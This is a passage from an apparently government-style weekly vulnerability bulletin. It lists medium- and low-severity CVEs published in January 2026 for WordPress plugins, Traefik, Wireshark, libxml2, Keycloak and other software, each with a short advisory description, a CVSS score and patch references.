| thimpress--WP Hotel Booking | The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce. | 2026-01-17 | 5.3 | CVE-2025-14075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc4eaec-b5d8-4707-9260-bac02a4b1866?source=cve https://plugins.trac.wordpress.org/browser/wp-hotel-booking/trunk/includes/class-wphb-ajax.php#L192 https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L192 https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L36 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429399%40wp-hotel-booking&new=3429399%40wp-hotel-booking&sfp_email=&sfph_mail= |
| thundernest--ImportExportTools NG | ImportExportTools NG 10.0.4 contains a persistent HTML injection vulnerability in the email export module that allows remote attackers to inject malicious HTML payloads. Attackers can send emails with crafted HTML in the subject that execute during HTML export, potentially compromising user data or session credentials. | 2026-01-15 | 6.1 | CVE-2021-47768 | ExploitDB-50496 ImportExportTools NG GitHub Repository Thunderbird Addon Page Vulnerability-Lab Disclosure |
| torstenbulk--DK PDF WordPress PDF Generator | The DK PDF - WordPress PDF Generator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.0 via the 'addContentToMpdf' function. This makes it possible for authenticated attackers, author level and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-16 | 5 | CVE-2025-14793 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b062f72a-542c-4212-af83-4faefbf69bd7?source=cve https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/Frontend/WordPressIntegration.php?marks=22-25#L22 https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/PDF/Generator.php?marks=24-56#L24 https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/modules/PDF/DocumentBuilder.php#L213 https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/templates/dkpdf-index.php#L134 |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.35 and 3.6.7, there is a potential vulnerability in Traefik ACME TLS certificates' automatic generation: the ACME TLS-ALPN fast path can allow unauthenticated clients to tie up go routines and file descriptors indefinitely when the ACME TLS challenge is enabled. A malicious client can open many connections, send a minimal ClientHello with acme-tls/1, then stop responding, leading to denial of service of the entry point. The vulnerability is fixed in 2.11.35 and 3.6.7. | 2026-01-15 | 5.9 | CVE-2026-22045 | https://github.com/traefik/traefik/security/advisories/GHSA-cwjm-3f7h-9hwq https://github.com/traefik/traefik/commit/e9f3089e9045812bcf1b410a9d40568917b26c3d https://github.com/traefik/traefik/releases/tag/v2.11.35 https://github.com/traefik/traefik/releases/tag/v3.6.7 |
| treeverse--lakeFS | lakeFS is an open-source tool that transforms object storage into a Git-like repositories. LakeFS's S3 gateway does not validate timestamps in authenticated requests, allowing replay attacks. Prior to 1.75.0, an attacker who captures a valid signed request (e.g., through network interception, logs, or compromised systems) can replay that request until credentials are rotated, even after the request is intended to expire. This vulnerability is fixed in 1.75.0. | 2026-01-15 | 6.5 | CVE-2025-68671 | https://github.com/treeverse/lakeFS/security/advisories/GHSA-f2ph-gc9m-q55f https://github.com/treeverse/lakeFS/issues/9599 https://github.com/treeverse/lakeFS/commit/92966ae611d7f1a2bbe7fd56f9568c975aab2bd8 |
| Ttyplus--MTPutty | MTPutty 1.0.1.21 contains a sensitive information disclosure vulnerability that allows local attackers to view SSH connection passwords through Windows PowerShell process listing. Attackers can run a PowerShell command to retrieve the full command line of MTPutty processes, exposing plaintext SSH credentials. | 2026-01-15 | 6.2 | CVE-2021-47759 | ExploitDB-50574 Official MTPutty Product Homepage |
| Ubeeinteractive--Ubee EVW327 | Ubee EVW327 contains a cross-site request forgery vulnerability that allows attackers to enable remote access without user interaction. Attackers can craft a malicious webpage that automatically submits a form to change router remote access settings to port 8080 without the user's consent. | 2026-01-16 | 5.3 | CVE-2021-47820 | ExploitDB-49920 Ubee Interactive Official Homepage VulnCheck Advisory: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) |
| umbraco--Umbraco | Umbraco CMS v8.14.1 contains a server-side request forgery vulnerability that allows attackers to manipulate baseUrl parameters in multiple dashboard and help controller endpoints. Attackers can craft malicious requests to the GetContextHelpForPage, GetRemoteDashboardContent, and GetRemoteDashboardCss endpoints to trigger unauthorized server-side requests to external hosts. | 2026-01-15 | 5.3 | CVE-2021-47776 | ExploitDB-50462 Umbraco Official Homepage Umbraco CMS Release Notes |
| Vertiv--Cyclades Serial Console Server | Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions. | 2026-01-13 | 6.2 | CVE-2022-50927 | ExploitDB-50773 Vertiv Official Homepage VulnCheck Advisory: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation |
| VideoLAN--VLC media player | mmstu.c in VideoLAN VLC media player before 3.0.22 allows an out-of-bounds read and denial of service via a crafted 0x01 response from an MMS server. | 2026-01-16 | 4.8 | CVE-2025-51602 | https://www.videolan.org/security/sb-vlc3022.html https://code.videolan.org/videolan/vlc/-/issues/29146 |
| Visual-Tools--Visual Tools DVR VX16 | Visual Tools DVR VX16 version 4.2.28 contains a local privilege escalation vulnerability in its Sudo configuration that allows attackers to gain root access. Attackers can exploit the unsafe Sudo settings by using mount commands to bind a shell, enabling unauthorized system-level privileges. | 2026-01-15 | 6.2 | CVE-2021-47799 | ExploitDB-50104 Official Vendor Homepage |
| vk011--Real Post Slider Lite | The Real Post Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2026-0680 | https://www.wordfence.com/threat-intel/vulnerabilities/id/324fd823-8ec9-4187-8694-6160bad8e093?source=cve https://plugins.trac.wordpress.org/browser/real-post-slider-lite/trunk/real-post-slider-lite.php#L130 https://plugins.trac.wordpress.org/browser/real-post-slider-lite/tags/2.4/real-post-slider-lite.php#L130 |
| webbu--WMF Mobile Redirector | The WMF Mobile Redirector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2026-0739 | https://www.wordfence.com/threat-intel/vulnerabilities/id/037b5c2c-510a-4fa5-b489-cb0478603be2?source=cve https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/trunk/includes/options-page.php#L55 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/tags/1.2/includes/options-page.php#L55 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/trunk/includes/options-page.php#L62 https://plugins.trac.wordpress.org/browser/wmf-mobile-redirector/tags/1.2/includes/options-page.php#L62 |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers. | 2026-01-12 | 5.3 | CVE-2026-22251 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-9rp8-h4g8-8766 https://github.com/WeblateOrg/wlc/pull/1098 https://github.com/WeblateOrg/wlc/commit/aafdb507a9e66574ade1f68c50c4fe75dbe80797 |
| Wireshark Foundation--Wireshark | IEEE 802.11 protocol dissector crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.3 | CVE-2026-0959 | https://www.wireshark.org/security/wnpa-sec-2026-02.html GitLab Issue #20939 |
| Wireshark Foundation--Wireshark | BLF file parser crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.5 | CVE-2026-0961 | https://www.wireshark.org/security/wnpa-sec-2026-01.html GitLab Issue #20880 |
| Wireshark Foundation--Wireshark | SOME/IP-SD protocol dissector crash in Wireshark 4.6.0 to 4.6.2 and 4.4.0 to 4.4.12 allows denial of service | 2026-01-14 | 5.3 | CVE-2026-0962 | https://www.wireshark.org/security/wnpa-sec-2026-03.html GitLab Issue #20945 |
| Wireshark Foundation--Wireshark | HTTP3 protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.2 allows denial of service | 2026-01-14 | 4.7 | CVE-2026-0960 | https://www.wireshark.org/security/wnpa-sec-2026-04.html GitLab Issue #20944 |
| wpcenter--AffiliateX Amazon Affiliate Plugin | The AffiliateX - Amazon Affiliate Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_customization_settings AJAX action in versions 1.0.0 to 1.3.9.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to store arbitrary JavaScript that executes whenever an AffiliateX block renders on the site. | 2026-01-15 | 6.4 | CVE-2025-13859 | https://www.wordfence.com/threat-intel/vulnerabilities/id/36d57b8d-7e62-413b-8ea9-87963b8cd469?source=cve https://plugins.trac.wordpress.org/changeset/3420957/affiliatex/trunk/includes/functions/AjaxFunctions.php https://plugins.trac.wordpress.org/changeset/3420957/affiliatex/trunk/includes/helpers/class-affiliatex-helpers.php |
| wpchill--Filr Secure document library | The Filr - Secure document library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via unrestricted file upload in all versions up to, and including, 1.2.11 due to insufficient file type restrictions in the FILR_Uploader class. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload malicious HTML files containing JavaScript that will execute whenever a user accesses the uploaded file, granted they have permission to create or edit posts with the 'filr' post type. | 2026-01-17 | 4.4 | CVE-2025-14632 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c16c3a8d-bae1-4729-86c8-ec13481ff187?source=cve https://plugins.trac.wordpress.org/browser/filr-protection/trunk/src/class-filr-uploader.php#L14 https://plugins.trac.wordpress.org/browser/filr-protection/tags/1.2.10/src/class-filr-uploader.php#L14 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425333%40filr-protection&new=3425333%40filr-protection&sfp_email=&sfph_mail= |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Exposure in all versions up to, and including, 10.14.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all booking records in the database, including personally identifiable information (PII) such as names, email addresses, phone numbers, physical addresses, payment status, booking costs, and booking hashes belonging to other users. | 2026-01-16 | 4.3 | CVE-2025-14982 | https://www.wordfence.com/threat-intel/vulnerabilities/id/161d92e3-d255-4967-9449-be263a46bec8?source=cve https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L150 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L722 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L918 https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L158 https://plugins.trac.wordpress.org/browser/booking/trunk/core/wpbc-activation.php#L661 https://plugins.trac.wordpress.org/browser/booking/trunk/core/any/class-admin-menu.php#L22 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432649%40booking%2Ftrunk&old=3416518%40booking%2Ftrunk&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?old_path=%2Fbooking&old=3436482&new_path=%2Fbooking&new=3436482&sfp_email=&sfph_mail= |
| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 6.5.5 via the 'eael_product_quickview_popup' function. This makes it possible for unauthenticated attackers to retrieve WooCommerce product information for products with draft, pending, or private status, which should normally be restricted. | 2026-01-16 | 5.3 | CVE-2026-1004 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06ef9a21-e2b9-40c7-9de5-cff175fa10a5?source=cve https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L820 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L64 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L65 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L832 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Traits/Ajax_Handler.php#L1439 https://github.com/WPDevelopers/essential-addons-for-elementor-lite/commit/4e43db06bcf12870cc3b185ed59b3fe2cd227945 |
| wpswings--Wallet System for WooCommerce Digital Wallet, Buy Now Pay Later (BNPL), Instant Cashback, Referral program, Partial & Subscription Payments | The Wallet System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'change_wallet_fund_request_status_callback' function in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to manipulate wallet withdrawal requests and arbitrarily increase their wallet balance or decrease other users' balances. | 2026-01-17 | 6.5 | CVE-2025-14450 | https://www.wordfence.com/threat-intel/vulnerabilities/id/466a5315-fc05-4b96-9dfd-17862fc406c5?source=cve https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/trunk/includes/class-wallet-system-ajaxhandler.php#L140 https://plugins.trac.wordpress.org/browser/wallet-system-for-woocommerce/tags/2.7.2/includes/class-wallet-system-ajaxhandler.php#L140 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3435898%40wallet-system-for-woocommerce&new=3435898%40wallet-system-for-woocommerce&sfp_email=&sfph_mail= |
| xiweicheng--TMS | A vulnerability was detected in xiweicheng TMS up to 2.28.0. Affected by this issue is the function Upload of the file src/main/java/com/lhjz/portal/controller/FileController.java. The manipulation of the argument filename results in unrestricted upload. The attack may be performed from remote. The exploit is now public and may be used. | 2026-01-17 | 6.3 | CVE-2026-1061 | VDB-341629 | xiweicheng TMS FileController.java upload unrestricted upload VDB-341629 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731240 | https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Unrestricted Upload https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| xiweicheng--TMS | A flaw has been found in xiweicheng TMS up to 2.28.0. This affects the function Summary of the file src/main/java/com/lhjz/portal/util/HtmlUtil.java. This manipulation of the argument url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-01-17 | 6.3 | CVE-2026-1062 | VDB-341630 | xiweicheng TMS HtmlUtil.java summary server-side request forgery VDB-341630 | CTI Indicators (IOB, IOC, IOA) Submit #731241 | https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Server-Side Request Forgery Submit #731242 | https://gitee.com/xiweicheng/tms/ Merchant Mall - Mall Development/TMS 1.0 Server-Side Request Forgery (Duplicate) https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/SSRF%EF%BC%881%EF%BC%89.md https://github.com/bkglfpp/CVE-md/blob/main/%E5%95%86%E6%88%B7%E5%95%86%E5%9F%8E%E2%80%94%E5%95%86%E5%9F%8E%E5%BC%80%E5%8F%91tms/SSRF%EF%BC%882%EF%BC%89.md |
| Xmind--Xmind | Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening. | 2026-01-16 | 6.1 | CVE-2021-47844 | ExploitDB-49827 Official Xmind Product Homepage Proof of Concept Video VulnCheck Advisory: Xmind 2020 - Persistent Cross-Site Scripting |
| YouPHPTube--YouPHPTube | YouPHPTube <= 7.8 contains a local file inclusion vulnerability that allows unauthenticated attackers to access arbitrary files by manipulating the 'lang' parameter in GET requests. Attackers can exploit the path traversal flaw in locale/function.php to include and view PHP files outside the intended directory by using directory traversal sequences. | 2026-01-13 | 6.2 | CVE-2021-47749 | ExploitDB-51101 Archived YouPHPTube Homepage VulnCheck Advisory: YouPHPTube <= 7.8 - Directory Traversal |
| YouPHPTube--YouPHPTube | YouPHPTube <= 7.8 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the redirectUri parameter in the signup page. Attackers can craft special signup URLs with embedded script tags to execute arbitrary JavaScript in victims' browsers when they access the signup page. | 2026-01-13 | 6.1 | CVE-2021-47750 | ExploitDB-51101 Archived YouPHPTube Homepage VulnCheck Advisory: YouPHPTube <= 7.8 - Cross-Site Scripting |
| zealopensource--User Registration Using Contact Form 7 | The User Registration Using Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_cf7_form_data' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to retrieve form settings which includes Facebook app secrets. | 2026-01-17 | 5.3 | CVE-2025-12825 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b49978c1-9254-4229-8d32-e12896301f3d?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433276%40user-registration-using-contact-form-7&new=3433276%40user-registration-using-contact-form-7&sfp_email=&sfph_mail= |
| Zippy--Zstore | Zstore, now referred to as Zippy CRM, 6.5.4 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts through unvalidated input parameters. Attackers can submit crafted payloads in manual insertion points to execute arbitrary JavaScript code in victim's browser context. | 2026-01-13 | 6.1 | CVE-2023-53985 | ExploitDB-51207 Zstore/Zippy-CRM Product Homepage Zstore/Zippy-CRM GitHub Repository Vulnerability Reproduction Repository VulnCheck Advisory: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) |
| zitadel--zitadel | ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6. | 2026-01-15 | 5.3 | CVE-2026-23511 | https://github.com/zitadel/zitadel/security/advisories/GHSA-pvm5-9frx-264r https://github.com/zitadel/zitadel/commit/b85ab69e4679b0268e2b0e9b4cd04e934af10dd2 https://github.com/zitadel/zitadel/commit/c300d4cc6a2775ab17ddfe76492f24170f8b858d https://github.com/zitadel/zitadel/releases/tag/v3.4.6 https://github.com/zitadel/zitadel/releases/tag/v4.9.1 |
| Zohocorp--ManageEngine ADManager Plus | Zohocorp ManageEngine ADManager Plus versions below 7230 are vulnerable to Path Traversal in the User Management module | 2026-01-13 | 5.5 | CVE-2025-9435 | https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2025-9435.html |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| andy_moyle--Church Admin | The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-17 | 2.2 | CVE-2026-0682 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=cve https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/sermon-podcast.php#L1181 https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/sermon-podcast.php#L1181 https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/functions.php#L6297 https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/functions.php#L6297 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440847%40church-admin&new=3440847%40church-admin&sfp_email=&sfph_mail= |
| bestpractical--Request Tracker | Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used. | 2026-01-16 | 2.6 | CVE-2025-61873 | https://docs.bestpractical.com/release-notes/rt/index.html |
| Fortinet--FortiSandbox | A Server-Side Request Forgery (SSRF) vulnerability [CWE-918] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox 4.4 all versions, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to proxy internal requests limited to plaintext endpoints only via crafted HTTP requests. | 2026-01-13 | 3.4 | CVE-2025-67685 | https://fortiguard.fortinet.com/psirt/FG-IR-25-783 |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing ownership check in the dnd_codedropz_upload_delete() function in all versions up to, and including, 1.3.9.2. This makes it possible for unauthenticated attackers to delete arbitrary uploaded files when the "Send attachments as links" setting is enabled. | 2026-01-15 | 3.7 | CVE-2025-14457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a182243-b24a-4c46-8b65-6b38d8509a51?source=cve https://plugins.trac.wordpress.org/changeset/3428236/drag-and-drop-multiple-file-upload-contact-form-7 |
| Lenovo--Tab M11 TB330FU TB330XU | A potential missing authentication vulnerability was reported in some Lenovo Tablets that could allow an unauthorized user with physical access to modify Control Center settings if the device is locked when the "Allow Control Center access when locked" option is disabled. | 2026-01-14 | 3.2 | CVE-2025-14058 | https://support.lenovo.com/us/en/product_security/LEN-207951 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.8 fail to validate input size before processing hashtags which allows an authenticated attacker to exhaust CPU resources via a single HTTP request containing a post with thousands space-separated tokens | 2026-01-16 | 3.1 | CVE-2025-14822 | https://mattermost.com/security-updates |
| n/a--LigeroSmart | A weakness has been identified in LigeroSmart up to 6.1.26. Impacted is an unknown function of the file /otrs/index.pl?Action=AgentTicketZoom. This manipulation of the argument TicketID causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 3.5 | CVE-2026-1048 | VDB-341600 | LigeroSmart index.pl cross site scripting VDB-341600 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729399 | LigeroSmart 6.1.26 Cross Site Scripting https://github.com/LigeroSmart/ligerosmart/issues/279 https://github.com/LigeroSmart/ligerosmart/issues/279#issue-3775562926 |
| n/a--LigeroSmart | A security vulnerability has been detected in LigeroSmart up to 6.1.26. The affected element is an unknown function of the file /otrs/index.pl. Such manipulation of the argument TicketID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 3.5 | CVE-2026-1049 | VDB-341601 | LigeroSmart index.pl cross site scripting VDB-341601 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729402 | LigeroSmart 6.1.26 Cross Site Scripting https://github.com/LigeroSmart/ligerosmart/issues/280 https://github.com/LigeroSmart/ligerosmart/issues/280#issue-3776580352 |
| nicbarker--clay | A security flaw has been discovered in nicbarker clay up to 0.14. This affects the function Clay__MeasureTextCached in the library clay.h. The manipulation results in null pointer dereference. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-18 | 3.3 | CVE-2025-15535 | VDB-341707 | nicbarker clay clay.h Clay__MeasureTextCached null pointer dereference VDB-341707 | CTI Indicators (IOB, IOC, IOA) Submit #733346 | nicbarker clay v0.14 and master-branch Memory Corruption https://github.com/nicbarker/clay/issues/566 https://github.com/oneafter/1215/blob/main/repro |
| nodejs--undici | Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0. | 2026-01-14 | 3.7 | CVE-2026-22036 | https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9 https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable. | 2026-01-15 | 3.7 | CVE-2026-0976 | https://access.redhat.com/security/cve/CVE-2026-0976 RHBZ#2429869 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk. | 2026-01-15 | 3.7 | CVE-2026-0989 | https://access.redhat.com/security/cve/CVE-2026-0989 RHBZ#2429933 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition. | 2026-01-15 | 2.9 | CVE-2026-0992 | https://access.redhat.com/security/cve/CVE-2026-0992 RHBZ#2429975 |
| SAP_SE--NW AS Java UME User Mapping | The User Management Engine (UME) in NetWeaver Application Server for Java (NW AS Java) utilizes an obsolete cryptographic algorithm for encrypting User Mapping data. This weakness could allow an attacker with high-privileged access to exploit the vulnerability under specific conditions potentially leading to partial disclosure of sensitive information.This has low impact on confidentiality with no impact on integrity and availability of the application. | 2026-01-13 | 3 | CVE-2026-0510 | https://me.sap.com/notes/3593356 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Identity Management | Due to insufficient input handling, the SAP Identity Management REST interface allows an authenticated administrator to submit specially crafted malicious REST requests that are processed by JNDI operations without adequate input neutralization. This may lead to limited disclosure or modification of data, resulting in low impact on confidentiality and integrity, with no impact on application availability. | 2026-01-13 | 3.8 | CVE-2026-0504 | https://me.sap.com/notes/3657998 https://url.sap/sapsecuritypatchday |
| SICK AG--TDC-X401GL | An attacker with administrative access may inject malicious content into the login page, potentially enabling cross-site scripting (XSS) attacks, leading to the extraction of sensitive data. | 2026-01-15 | 3.8 | CVE-2026-22919 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | The device's passwords have not been adequately salted, making them vulnerable to password extraction attacks. | 2026-01-15 | 3.7 | CVE-2026-22920 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| THM-Health--PILOS | PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.10.0, Cross-Site Request Forgery (CSRF) vulnerability exists in an administrative API endpoint responsible for terminating all active video conferences on a single server. The affected endpoint performs a destructive action but is exposed via an HTTP GET request. Although proper authorization checks are enforced and the endpoint cannot be triggered cross-site, the use of GET allows the action to be implicitly invoked through same-site content (e.g. embedded resources rendered within the application). As a result, an authenticated administrator who views crafted content within the application may unknowingly trigger the endpoint, causing all active video conferences on the server to be terminated without explicit intent or confirmation. This vulnerability is fixed in 4.10.0. | 2026-01-12 | 2.4 | CVE-2026-22800 | https://github.com/THM-Health/PILOS/security/advisories/GHSA-r24c-9p4j-rqw9 https://github.com/THM-Health/PILOS/commit/d9ab9bb7ac0a8581c25e24cb7db2152d40be4d1b |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, the SSL verification would be skipped for some crafted URLs. This vulnerability is fixed in 1.17.0. | 2026-01-12 | 2.5 | CVE-2026-22250 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-2mmv-7rrp-g8xh https://github.com/WeblateOrg/wlc/pull/1097 https://github.com/WeblateOrg/wlc/commit/a513864ec4daad00146e6d6e039559726e256fa3 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
